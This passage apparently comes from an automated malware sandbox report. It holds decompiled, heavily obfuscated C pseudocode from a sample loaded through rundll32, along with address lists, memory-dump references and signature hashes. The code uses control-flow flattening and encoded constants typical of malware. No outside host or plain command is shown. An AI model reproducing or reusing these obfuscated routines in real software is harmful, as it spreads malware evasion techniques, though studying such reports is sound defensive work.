							}
						}
					}
					goto L27;
					L24:
					__eflags = _t382 - 0xd4a25d5;
				} while (__eflags != 0);
				goto L27;
			}























































                                                                                                                                                            0x0037225a
                                                                                                                                                            0x00372262
                                                                                                                                                            0x00372269
                                                                                                                                                            0x0037226b
                                                                                                                                                            0x00372272
                                                                                                                                                            0x00372273
                                                                                                                                                            0x00372274
                                                                                                                                                            0x00372275
                                                                                                                                                            0x0037227a
                                                                                                                                                            0x00372282
                                                                                                                                                            0x00372285
                                                                                                                                                            0x0037228c
                                                                                                                                                            0x00372294
                                                                                                                                                            0x00372299
                                                                                                                                                            0x003722a7
                                                                                                                                                            0x003722ac
                                                                                                                                                            0x003722b0
                                                                                                                                                            0x003722b5
                                                                                                                                                            0x003722bd
                                                                                                                                                            0x003722c5
                                                                                                                                                            0x003722cd
                                                                                                                                                            0x003722d5
                                                                                                                                                            0x003722dd
                                                                                                                                                            0x003722e5
                                                                                                                                                            0x003722ed
                                                                                                                                                            0x003722f5
                                                                                                                                                            0x003722fd
                                                                                                                                                            0x0037230d
                                                                                                                                                            0x00372313
                                                                                                                                                            0x0037231b
                                                                                                                                                            0x00372323
                                                                                                                                                            0x0037232b
                                                                                                                                                            0x00372330
                                                                                                                                                            0x00372338
                                                                                                                                                            0x00372340
                                                                                                                                                            0x0037234c
                                                                                                                                                            0x00372351
                                                                                                                                                            0x00372357
                                                                                                                                                            0x0037235f
                                                                                                                                                            0x0037236a
                                                                                                                                                            0x00372375
                                                                                                                                                            0x00372380
                                                                                                                                                            0x00372388
                                                                                                                                                            0x00372390
                                                                                                                                                            0x00372398
                                                                                                                                                            0x003723a0
                                                                                                                                                            0x003723a8
                                                                                                                                                            0x003723ad
                                                                                                                                                            0x003723b2
                                                                                                                                                            0x003723ba
                                                                                                                                                            0x003723c7
                                                                                                                                                            0x003723c8
                                                                                                                                                            0x003723d2
                                                                                                                                                            0x003723d6
                                                                                                                                                            0x003723de
                                                                                                                                                            0x003723e6
                                                                                                                                                            0x003723ee
                                                                                                                                                            0x003723f3
                                                                                                                                                            0x003723fd
                                                                                                                                                            0x00372411
                                                                                                                                                            0x00372416
                                                                                                                                                            0x0037241f
                                                                                                                                                            0x0037242a
                                                                                                                                                            0x00372432
                                                                                                                                                            0x0037243f
                                                                                                                                                            0x00372442
                                                                                                                                                            0x00372446
                                                                                                                                                            0x0037244e
                                                                                                                                                            0x00372456
                                                                                                                                                            0x0037245e
                                                                                                                                                            0x0037246e
                                                                                                                                                            0x00372472
                                                                                                                                                            0x0037247a
                                                                                                                                                            0x00372485
                                                                                                                                                            0x00372490
                                                                                                                                                            0x0037249b
                                                                                                                                                            0x003724a3
                                                                                                                                                            0x003724ab
                                                                                                                                                            0x003724b3
                                                                                                                                                            0x003724c5
                                                                                                                                                            0x003724ca
                                                                                                                                                            0x003724d3
                                                                                                                                                            0x003724de
                                                                                                                                                            0x003724e6
                                                                                                                                                            0x003724eb
                                                                                                                                                            0x003724f3
                                                                                                                                                            0x00372500
                                                                                                                                                            0x00372501
                                                                                                                                                            0x00372505
                                                                                                                                                            0x0037250d
                                                                                                                                                            0x00372515
                                                                                                                                                            0x0037251d
                                                                                                                                                            0x00372525
                                                                                                                                                            0x0037252d
                                                                                                                                                            0x00372532
                                                                                                                                                            0x00372537
                                                                                                                                                            0x0037253f
                                                                                                                                                            0x0037254c
                                                                                                                                                            0x00372550
                                                                                                                                                            0x00372558
                                                                                                                                                            0x00372560
                                                                                                                                                            0x00372566
                                                                                                                                                            0x0037256a
                                                                                                                                                            0x0037256f
                                                                                                                                                            0x00372573
                                                                                                                                                            0x00372578
                                                                                                                                                            0x00372580
                                                                                                                                                            0x0037258b
                                                                                                                                                            0x00372596
                                                                                                                                                            0x003725a1
                                                                                                                                                            0x003725a9
                                                                                                                                                            0x003725b1
                                                                                                                                                            0x003725b9
                                                                                                                                                            0x003725c1
                                                                                                                                                            0x003725c6
                                                                                                                                                            0x003725cb
                                                                                                                                                            0x003725d3
                                                                                                                                                            0x003725e6
                                                                                                                                                            0x003725ed
                                                                                                                                                            0x003725f8
                                                                                                                                                            0x00372600
                                                                                                                                                            0x00372608
                                                                                                                                                            0x0037260d
                                                                                                                                                            0x00372612
                                                                                                                                                            0x0037261c
                                                                                                                                                            0x00372635
                                                                                                                                                            0x0037263a
                                                                                                                                                            0x00372643
                                                                                                                                                            0x0037264e
                                                                                                                                                            0x00372656
                                                                                                                                                            0x0037265b
                                                                                                                                                            0x00372660
                                                                                                                                                            0x00372668
                                                                                                                                                            0x00372674
                                                                                                                                                            0x0037267c
                                                                                                                                                            0x00372680
                                                                                                                                                            0x00372685
                                                                                                                                                            0x0037268d
                                                                                                                                                            0x00372695
                                                                                                                                                            0x0037269d
                                                                                                                                                            0x003726aa
                                                                                                                                                            0x003726ae
                                                                                                                                                            0x003726b6
                                                                                                                                                            0x003726be
                                                                                                                                                            0x003726c6
                                                                                                                                                            0x003726d3
                                                                                                                                                            0x003726d7
                                                                                                                                                            0x003726dc
                                                                                                                                                            0x003726e4
                                                                                                                                                            0x003726ef
                                                                                                                                                            0x003726fa
                                                                                                                                                            0x003726fa
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372705
                                                                                                                                                            0x00372707
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037270d
                                                                                                                                                            0x0037282a
                                                                                                                                                            0x0037282f
                                                                                                                                                            0x00372832
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372713
                                                                                                                                                            0x00372719
                                                                                                                                                            0x00372808
                                                                                                                                                            0x0037280a
                                                                                                                                                            0x0037280d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037271f
                                                                                                                                                            0x00372725
                                                                                                                                                            0x003727f2
                                                                                                                                                            0x003727f7
                                                                                                                                                            0x003727fa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037272b
                                                                                                                                                            0x00372731
                                                                                                                                                            0x003727c0
                                                                                                                                                            0x003727c5
                                                                                                                                                            0x003727c8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372733
                                                                                                                                                            0x00372739
                                                                                                                                                            0x0037278b
                                                                                                                                                            0x00372790
                                                                                                                                                            0x00372793
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037273b
                                                                                                                                                            0x00372741
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372747
                                                                                                                                                            0x00372756
                                                                                                                                                            0x00372757
                                                                                                                                                            0x00372758
                                                                                                                                                            0x0037275d
                                                                                                                                                            0x00372763
                                                                                                                                                            0x00372769
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372769
                                                                                                                                                            0x00372763
                                                                                                                                                            0x00372741
                                                                                                                                                            0x00372739
                                                                                                                                                            0x00372731
                                                                                                                                                            0x00372725
                                                                                                                                                            0x00372719
                                                                                                                                                            0x0037293e
                                                                                                                                                            0x00372940
                                                                                                                                                            0x00372945
                                                                                                                                                            0x00372945
                                                                                                                                                            0x0037294f
                                                                                                                                                            0x0037294f
                                                                                                                                                            0x0037283c
                                                                                                                                                            0x00372842
                                                                                                                                                            0x003728fd
                                                                                                                                                            0x00372902
                                                                                                                                                            0x00372905
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372848
                                                                                                                                                            0x00372848
                                                                                                                                                            0x0037284e
                                                                                                                                                            0x00372936
                                                                                                                                                            0x00372854
                                                                                                                                                            0x00372854
                                                                                                                                                            0x00372856
                                                                                                                                                            0x003728d3
                                                                                                                                                            0x003728d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372858
                                                                                                                                                            0x00372858
                                                                                                                                                            0x0037285e
                                                                                                                                                            0x003728ba
                                                                                                                                                            0x003728bf
                                                                                                                                                            0x003728c2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372860
                                                                                                                                                            0x00372860
                                                                                                                                                            0x00372866
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037286c
                                                                                                                                                            0x00372889
                                                                                                                                                            0x0037288e
                                                                                                                                                            0x00372891
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00372891
                                                                                                                                                            0x00372866
                                                                                                                                                            0x0037285e
                                                                                                                                                            0x00372856
                                                                                                                                                            0x0037284e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037290a
                                                                                                                                                            0x0037290a
                                                                                                                                                            0x0037290a
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                                            • API String ID: 0-245365489
                                                                                                                                                            • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                                            • Instruction ID: 011ae69891b6eb8290987484a95b5742a4581c9a99a31eadcf9f34344e768cdc
                                                                                                                                                            • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                                            • Instruction Fuzzy Hash: 5AF131715083809FD369CF61C58AA5BFBE1FBD4348F10891DF29A8A261D7B58958CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00379714 Relevance: 14.0, Strings: 11, Instructions: 232COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E00379714(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t251;
				intOrPtr _t252;
				intOrPtr _t253;
				void* _t257;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				void* _t292;
				void* _t293;
				signed int* _t296;
				signed int* _t297;

				_t296 =  &_v104;
				_v4 = _v4 & 0x00000000;
				_v12 = 0xc5b764;
				_v8 = 0xb6da07;
				_v100 = 0x6b81aa;
				_v100 = _v100 ^ 0x5133456b;
				_t8 =  &_v100; // 0x5133456b
				_v100 =  *_t8 * 0x6e;
				_t292 = __edx;
				_v100 = _v100 << 0xa;
				_v100 = _v100 ^ 0x922ec96f;
				_t257 = __ecx;
				_v20 = 0x2c208b;
				_t293 = 0x52ffaa2;
				_v20 = _v20 + 0xffff37e6;
				_v20 = _v20 ^ 0x00212911;
				_v60 = 0xb21c01;
				_v60 = _v60 ^ 0x31980a41;
				_v60 = _v60 + 0xffff033c;
				_v60 = _v60 ^ 0x31255444;
				_v64 = 0x612501;
				_v64 = _v64 << 2;
				_v64 = _v64 + 0xf44;
				_v64 = _v64 ^ 0x018d6347;
				_v52 = 0x111460;
				_v52 = _v52 + 0xffffc2ff;
				_v52 = _v52 | 0x8d441097;
				_v52 = _v52 ^ 0x8d5fe5cb;
				_v56 = 0xb6e38a;
				_t259 = 0x67;
				_v56 = _v56 / _t259;
				_t260 = 0x41;
				_v56 = _v56 * 0x32;
				_v56 = _v56 ^ 0x00536033;
				_v96 = 0xaa1e09;
				_v96 = _v96 / _t260;
				_t261 = 0x73;
				_v96 = _v96 * 0xd;
				_v96 = _v96 / _t261;
				_v96 = _v96 ^ 0x00047537;
				_v88 = 0xebbfc;
				_v88 = _v88 << 7;
				_v88 = _v88 | 0x3053ba58;
				_t262 = 0x7f;
				_v88 = _v88 / _t262;
				_v88 = _v88 ^ 0x006c206b;
				_v44 = 0xece271;
				_v44 = _v44 + 0xffff86ef;
				_v44 = _v44 + 0x6a70;
				_v44 = _v44 ^ 0x00eb9b45;
				_v48 = 0xd70038;
				_v48 = _v48 | 0x378b661e;
				_v48 = _v48 ^ 0xfc23f8e2;
				_v48 = _v48 ^ 0xcbf8b4c1;
				_v92 = 0x86f3ef;
				_v92 = _v92 << 0xd;
				_v92 = _v92 >> 0xd;
				_v92 = _v92 + 0x4513;
				_v92 = _v92 ^ 0x000ef1b6;
				_v80 = 0x7a204;
				_v80 = _v80 + 0xffffa60a;
				_v80 = _v80 | 0x4d150135;
				_v80 = _v80 + 0xffff9d32;
				_v80 = _v80 ^ 0x4d179d3b;
				_v40 = 0x124198;
				_v40 = _v40 ^ 0x5335feb3;
				_t263 = 0x78;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0xcbb00a78;
				_v84 = 0xcaa24a;
				_v84 = _v84 * 0x42;
				_v84 = _v84 ^ 0x45be5790;
				_v84 = _v84 + 0xffff0d2f;
				_v84 = _v84 ^ 0x718e360f;
				_v24 = 0x4d7038;
				_v24 = _v24 | 0x28b75b7a;
				_v24 = _v24 ^ 0x28f4655f;
				_v28 = 0x844762;
				_v28 = _v28 ^ 0xe0e1df8a;
				_v28 = _v28 ^ 0xe064bc9e;
				_v32 = 0xfc2930;
				_v32 = _v32 / _t263;
				_v32 = _v32 ^ 0x00028374;
				_v104 = 0xce3f74;
				_v104 = _v104 + 0x3224;
				_v104 = _v104 + 0x85ca;
				_t264 = 0xe;
				_v104 = _v104 / _t264;
				_v104 = _v104 ^ 0x0007887d;
				_v68 = 0x11fdc1;
				_v68 = _v68 | 0x0fd109af;
				_t265 = 0x52;
				_v68 = _v68 / _t265;
				_v68 = _v68 ^ 0x00367c27;
				_v72 = 0xa9a7e;
				_v72 = _v72 * 0x16;
				_v72 = _v72 ^ 0xca0bce5f;
				_v72 = _v72 ^ 0xcae4b7d2;
				_v76 = 0xb2d6c0;
				_v76 = _v76 + 0xffff5dcd;
				_v76 = _v76 >> 0xe;
				_v76 = _v76 >> 4;
				_v76 = _v76 ^ 0x0002e66e;
				_v16 = 0x41627;
				_v16 = _v16 + 0xccf7;
				_v16 = _v16 ^ 0x00091dff;
				_v36 = 0xd94625;
				_v36 = _v36 + 0x741;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x4d68793e;
				while(1) {
					L1:
					_t251 = 0xc3f018b;
					do {
						L2:
						while(_t293 != 0x52ffaa2) {
							if(_t293 == 0x865547f) {
								_t265 = _v80;
								_t252 = E0037CDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
								_t296 =  &(_t296[2]);
								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
								__eflags = _t252;
								_t251 = 0xc3f018b;
								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
								continue;
							}
							if(_t293 == 0xb133873) {
								_push(_v64);
								_t253 = E0038C3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
								_t297 =  &(_t296[4]);
								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
								__eflags = _t253;
								if(_t253 != 0) {
									E00377B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
									_push( *((intOrPtr*)(_t292 + 0x38)));
									_push(_v92);
									_push(_v48);
									_t265 = _v88;
									E00377C37(_v88, _v44);
									_t296 =  &(_t297[6]);
									_t293 = 0x865547f;
									goto L1;
								}
							} else {
								if(_t293 == 0xb7a2405) {
									return E00389E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
								}
								if(_t293 != _t251) {
									goto L13;
								} else {
									_t253 = E003746BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E0037219A, _v72);
									_t296 =  &(_t296[0xa]);
									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
									if(_t253 == 0) {
										_t293 = 0xb7a2405;
										while(1) {
											L1:
											_t251 = 0xc3f018b;
											goto L2;
										}
									}
								}
							}
							return _t253;
						}
						_t293 = 0xb133873;
						L13:
						__eflags = _t293 - 0x1aeb2e;
					} while (__eflags != 0);
					return _t251;
				}
			}











































                                                                                                                                                            0x00379714
                                                                                                                                                            0x00379717
                                                                                                                                                            0x0037971c
                                                                                                                                                            0x00379724
                                                                                                                                                            0x0037972c
                                                                                                                                                            0x00379734
                                                                                                                                                            0x0037973c
                                                                                                                                                            0x00379745
                                                                                                                                                            0x00379749
                                                                                                                                                            0x0037974b
                                                                                                                                                            0x00379752
                                                                                                                                                            0x0037975a
                                                                                                                                                            0x0037975c
                                                                                                                                                            0x00379764
                                                                                                                                                            0x00379769
                                                                                                                                                            0x00379771
                                                                                                                                                            0x00379779
                                                                                                                                                            0x00379781
                                                                                                                                                            0x00379789
                                                                                                                                                            0x00379791
                                                                                                                                                            0x00379799
                                                                                                                                                            0x003797a1
                                                                                                                                                            0x003797a6
                                                                                                                                                            0x003797ae
                                                                                                                                                            0x003797b6
                                                                                                                                                            0x003797be
                                                                                                                                                            0x003797c6
                                                                                                                                                            0x003797ce
                                                                                                                                                            0x003797d6
                                                                                                                                                            0x003797e4
                                                                                                                                                            0x003797e9
                                                                                                                                                            0x003797f4
                                                                                                                                                            0x003797f7
                                                                                                                                                            0x003797fb
                                                                                                                                                            0x00379803
                                                                                                                                                            0x00379813
                                                                                                                                                            0x0037981c
                                                                                                                                                            0x0037981f
                                                                                                                                                            0x0037982b
                                                                                                                                                            0x0037982f
                                                                                                                                                            0x00379837
                                                                                                                                                            0x0037983f
                                                                                                                                                            0x00379844
                                                                                                                                                            0x00379850
                                                                                                                                                            0x00379853
                                                                                                                                                            0x00379857
                                                                                                                                                            0x0037985f
                                                                                                                                                            0x00379867
                                                                                                                                                            0x0037986f
                                                                                                                                                            0x00379877
                                                                                                                                                            0x0037987f
                                                                                                                                                            0x00379887
                                                                                                                                                            0x0037988f
                                                                                                                                                            0x00379897
                                                                                                                                                            0x0037989f
                                                                                                                                                            0x003798a7
                                                                                                                                                            0x003798ac
                                                                                                                                                            0x003798b1
                                                                                                                                                            0x003798b9
                                                                                                                                                            0x003798c1
                                                                                                                                                            0x003798c9
                                                                                                                                                            0x003798d3
                                                                                                                                                            0x003798e0
                                                                                                                                                            0x003798e8
                                                                                                                                                            0x003798f0
                                                                                                                                                            0x003798f8
                                                                                                                                                            0x00379907
                                                                                                                                                            0x0037990a
                                                                                                                                                            0x0037990e
                                                                                                                                                            0x00379916
                                                                                                                                                            0x00379923
                                                                                                                                                            0x00379927
                                                                                                                                                            0x0037992f
                                                                                                                                                            0x00379937
                                                                                                                                                            0x0037993f
                                                                                                                                                            0x00379947
                                                                                                                                                            0x0037994f
                                                                                                                                                            0x00379957
                                                                                                                                                            0x0037995f
                                                                                                                                                            0x00379967
                                                                                                                                                            0x0037996f
                                                                                                                                                            0x0037997f
                                                                                                                                                            0x00379983
                                                                                                                                                            0x0037998b
                                                                                                                                                            0x00379993
                                                                                                                                                            0x0037999b
                                                                                                                                                            0x003799a7
                                                                                                                                                            0x003799ac
                                                                                                                                                            0x003799b2
                                                                                                                                                            0x003799ba
                                                                                                                                                            0x003799c2
                                                                                                                                                            0x003799ce
                                                                                                                                                            0x003799d1
                                                                                                                                                            0x003799d5
                                                                                                                                                            0x003799dd
                                                                                                                                                            0x003799ea
                                                                                                                                                            0x003799ee
                                                                                                                                                            0x003799f6
                                                                                                                                                            0x003799fe
                                                                                                                                                            0x00379a06
                                                                                                                                                            0x00379a0e
                                                                                                                                                            0x00379a13
                                                                                                                                                            0x00379a18
                                                                                                                                                            0x00379a20
                                                                                                                                                            0x00379a28
                                                                                                                                                            0x00379a30
                                                                                                                                                            0x00379a38
                                                                                                                                                            0x00379a40
                                                                                                                                                            0x00379a48
                                                                                                                                                            0x00379a4d
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a5a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a5a
                                                                                                                                                            0x00379a6c
                                                                                                                                                            0x00379b32
                                                                                                                                                            0x00379b36
                                                                                                                                                            0x00379b3b
                                                                                                                                                            0x00379b3e
                                                                                                                                                            0x00379b41
                                                                                                                                                            0x00379b45
                                                                                                                                                            0x00379b4a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b4a
                                                                                                                                                            0x00379a78
                                                                                                                                                            0x00379ac5
                                                                                                                                                            0x00379ad8
                                                                                                                                                            0x00379add
                                                                                                                                                            0x00379ae0
                                                                                                                                                            0x00379ae3
                                                                                                                                                            0x00379ae5
                                                                                                                                                            0x00379afd
                                                                                                                                                            0x00379b02
                                                                                                                                                            0x00379b05
                                                                                                                                                            0x00379b09
                                                                                                                                                            0x00379b11
                                                                                                                                                            0x00379b15
                                                                                                                                                            0x00379b1a
                                                                                                                                                            0x00379b1d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b1d
                                                                                                                                                            0x00379a7a
                                                                                                                                                            0x00379a7c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379b7a
                                                                                                                                                            0x00379a84
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a8a
                                                                                                                                                            0x00379aae
                                                                                                                                                            0x00379ab3
                                                                                                                                                            0x00379ab6
                                                                                                                                                            0x00379abb
                                                                                                                                                            0x00379ac1
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379a55
                                                                                                                                                            0x00379abb
                                                                                                                                                            0x00379a84
                                                                                                                                                            0x00379b82
                                                                                                                                                            0x00379b82
                                                                                                                                                            0x00379b52
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00379b57
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00379a5a

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                                            • API String ID: 0-1622084174
                                                                                                                                                            • Opcode ID: 8eaf5c6f0a753a4ec66574d05432d87a00b0973e70b1ee48b1d531814ef1604d
                                                                                                                                                            • Instruction ID: c9ed7f3a82b4a6d8a2563c9b1eb65a63a8158b4bbfced1bbe62adc437f247720
                                                                                                                                                            • Opcode Fuzzy Hash: 8eaf5c6f0a753a4ec66574d05432d87a00b0973e70b1ee48b1d531814ef1604d
                                                                                                                                                            • Instruction Fuzzy Hash: E7B140729083419FC3A8CF25C58A90BFBF1BBC4758F008A1DF59A96220D3B5D959CF82
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003764E2 Relevance: 12.9, Strings: 10, Instructions: 358COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E003764E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v260;
				signed int _v264;
				intOrPtr _v268;
				char _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				void* _t311;
				void* _t332;
				intOrPtr _t335;
				intOrPtr _t338;
				intOrPtr _t343;
				void* _t345;
				void* _t347;
				void* _t349;
				void* _t352;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr* _t362;
				intOrPtr _t364;
				signed int _t367;
				intOrPtr _t386;
				intOrPtr _t387;
				intOrPtr _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t423;
				signed int* _t425;
				void* _t427;

				_push(_a24);
				_t423 = __edx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t311);
				_v264 = _v264 & 0x00000000;
				_t425 =  &(( &_v412)[8]);
				_v268 = 0x38f10b;
				_v376 = 0x1d6e4;
				_t364 = 0;
				_v376 = _v376 + 0x2cf5;
				_t367 = 0x349a1a2;
				_v376 = _v376 + 0xffffbc4f;
				_v376 = _v376 + 0xc828;
				_v376 = _v376 ^ 0x000c4abe;
				_v344 = 0xf0b614;
				_t415 = 0x49;
				_v344 = _v344 / _t415;
				_v344 = _v344 ^ 0x0006b22b;
				_v296 = 0xc48c2;
				_v296 = _v296 >> 0xa;
				_v296 = _v296 ^ 0x0001ad51;
				_v384 = 0x7feda9;
				_t416 = 0x39;
				_v384 = _v384 * 0x1a;
				_v384 = _v384 ^ 0x3da8c069;
				_v384 = _v384 + 0xffff691b;
				_v384 = _v384 ^ 0x315a0b75;
				_v400 = 0x77d138;
				_v400 = _v400 + 0xffff5a87;
				_v400 = _v400 << 3;
				_v400 = _v400 + 0xffff9ef2;
				_v400 = _v400 ^ 0x03bdd381;
				_v312 = 0x267902;
				_v312 = _v312 | 0xf93e454e;
				_v312 = _v312 ^ 0xf93fe769;
				_v308 = 0x6d5338;
				_v308 = _v308 ^ 0x3f4c4be5;
				_v308 = _v308 ^ 0x3f211e75;
				_v328 = 0x5e1da9;
				_v328 = _v328 / _t416;
				_v328 = _v328 ^ 0x000cc368;
				_v364 = 0xd2dbf2;
				_v364 = _v364 + 0xffffefaa;
				_v364 = _v364 + 0xd543;
				_v364 = _v364 ^ 0x00d6d9fb;
				_v304 = 0x235f1e;
				_t417 = 0x2e;
				_v304 = _v304 / _t417;
				_v304 = _v304 ^ 0x000b3ded;
				_v320 = 0xc8231f;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x8237c00a;
				_v356 = 0xee2c9b;
				_v356 = _v356 ^ 0xa0da06c4;
				_v356 = _v356 ^ 0xf246f640;
				_v356 = _v356 ^ 0x52703357;
				_v412 = 0xc100a3;
				_v412 = _v412 ^ 0xb8e7c080;
				_v412 = _v412 ^ 0xb6721a67;
				_v412 = _v412 ^ 0xff44de7f;
				_v412 = _v412 ^ 0xf11e2702;
				_v396 = 0xa6af25;
				_v396 = _v396 << 0x10;
				_v396 = _v396 >> 7;
				_v396 = _v396 + 0xffff7054;
				_v396 = _v396 ^ 0x015ec427;
				_v404 = 0x1f48c8;
				_t418 = 0x2d;
				_v404 = _v404 / _t418;
				_v404 = _v404 << 0xb;
				_v404 = _v404 | 0x7455ca98;
				_v404 = _v404 ^ 0x75da0b0a;
				_v368 = 0x174318;
				_v368 = _v368 + 0x805d;
				_v368 = _v368 ^ 0x0012ca04;
				_v408 = 0x579c92;
				_t419 = 0x65;
				_v408 = _v408 * 0x61;
				_v408 = _v408 ^ 0x6a2d4e62;
				_v408 = _v408 + 0xd9d0;
				_v408 = _v408 ^ 0x4b1c9053;
				_v392 = 0x2598b2;
				_v392 = _v392 * 0xd;
				_v392 = _v392 ^ 0xb79fc0d8;
				_v392 = _v392 + 0xffff9085;
				_v392 = _v392 ^ 0xb671271d;
				_v324 = 0x8734;
				_v324 = _v324 + 0xffff82f4;
				_v324 = _v324 ^ 0x000c0e93;
				_v332 = 0x81f499;
				_v332 = _v332 ^ 0xcb023f28;
				_v332 = _v332 ^ 0xcb8aeffa;
				_v340 = 0xbb3951;
				_v340 = _v340 ^ 0x050a1ed9;
				_v340 = _v340 ^ 0x05b74055;
				_v372 = 0x5c4d3f;
				_v372 = _v372 + 0xffffba18;
				_v372 = _v372 | 0xc0b40c25;
				_v372 = _v372 >> 3;
				_v372 = _v372 ^ 0x1815f0ae;
				_v380 = 0xe44e59;
				_v380 = _v380 + 0x7d25;
				_v380 = _v380 + 0xffff00c0;
				_v380 = _v380 << 0xa;
				_v380 = _v380 ^ 0x8f30862d;
				_v360 = 0x1cbdf;
				_v360 = _v360 + 0xffff6e4b;
				_v360 = _v360 >> 8;
				_v360 = _v360 ^ 0x0001cec6;
				_v348 = 0xf4499d;
				_v348 = _v348 + 0x832d;
				_v348 = _v348 << 2;
				_v348 = _v348 ^ 0x03dc7480;
